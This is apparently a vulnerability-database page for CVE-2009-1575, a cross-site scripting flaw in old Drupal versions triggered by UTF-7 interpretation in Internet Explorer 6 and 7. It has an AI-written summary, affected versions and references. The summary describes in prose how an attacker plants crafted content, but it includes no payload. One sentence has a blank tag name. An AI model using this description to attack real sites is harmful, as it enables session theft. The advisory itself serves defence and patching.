CVE-2009-1575
Description
Cross-site scripting (XSS) vulnerability in Drupal 5.x before 5.17 and 6.x before 6.11, as used in vbDrupal before 5.17.0, allows remote attackers to inject arbitrary web script or HTML via crafted UTF-8 byte sequences before the Content-Type meta tag, which are treated as UTF-7 by Internet Explorer 6 and 7.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Cross-site scripting in Drupal 5.x and 6.x allows remote attackers to execute arbitrary script via crafted UTF-8 byte sequences that are interpreted as UTF-7 by Internet Explorer 6/7.
Vulnerability
Cross-site scripting (XSS) vulnerability exists in Drupal 5.x before version 5.17 and Drupal 6.x before version 6.11 [2]. The vulnerability arises when user-supplied content contains specific UTF-8 byte sequences that are placed before the `` tag. Internet Explorer 6 and 7 may interpret these byte sequences as UTF-7, bypassing the charset specified in the HTTP header, allowing injection of arbitrary script [2].
Exploitation
An attacker must have the ability to post content (e.g., comments, nodes) on a Drupal site [2]. The attacker crafts a string containing UTF-8 byte sequences that are valid in UTF-8 but dangerous when interpreted as UTF-7. When a victim using Internet Explorer 6 or 7 visits a page containing this crafted content, the browser erroneously treats the byte sequences as UTF-7, allowing the attacker's script to execute in the context of the website. No authentication is required beyond the ability to create content [2].
Impact
Successful exploitation allows remote attackers to inject arbitrary web script or HTML, leading to cross-site scripting (XSS) attacks [2]. Impact includes session hijacking, defacement, or redirection to malicious sites, depending on the victim's privileges. The attack is limited to users of Internet Explorer 6 and 7 [2].
Mitigation
The vulnerability is fixed in Drupal versions 5.17 and 6.11, released on 2009-April-29 [2]. Users should upgrade immediately. For those unable to upgrade, a patch is available from the Drupal security advisory [2]. No other workarounds are documented. This CVE is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
46cpe:2.3:a:drupal:drupal:5.0:*:*:*:*:*:*:*+ 44 more
- cpe:2.3:a:drupal:drupal:5.0:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.0:beta1:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.0:beta2:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.0:rc1:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.0:rc2:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.1:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.10:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.11:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.12:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.13:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.14:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.15:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.16:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.1_rev1.1:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.2:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.3:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.4:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.5.:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.5:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.6:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.7:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.8:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.9:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:beta1:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:beta2:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:beta3:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:beta4:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:rc-1:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:rc-2:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:rc-3:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:rc-4:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.1:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.10:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.2:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.3:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.4:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.5:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.6:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.7:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.8:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.9:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6:beta1:*:*:*:*:*:*
- (no CPE)range: 5.x <5.17; 6.x <6.11
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
11- drupal.org/node/449078nvdPatchVendor Advisory
- www.osvdb.org/54152nvdPatch
- www.vbdrupal.org/forum/showthread.phpnvdPatchVendor Advisory
- www.vupen.com/english/advisories/2009/1216nvdPatchVendor Advisory
- secunia.com/advisories/34948nvdVendor Advisory
- secunia.com/advisories/34950nvdVendor Advisory
- secunia.com/advisories/34980nvd
- www.debian.org/security/2009/dsa-1792nvd
- exchange.xforce.ibmcloud.com/vulnerabilities/50250nvd
- www.redhat.com/archives/fedora-package-announce/2009-May/msg00108.htmlnvd
- www.redhat.com/archives/fedora-package-announce/2009-May/msg00133.htmlnvd
News mentions
0No linked articles in our index yet.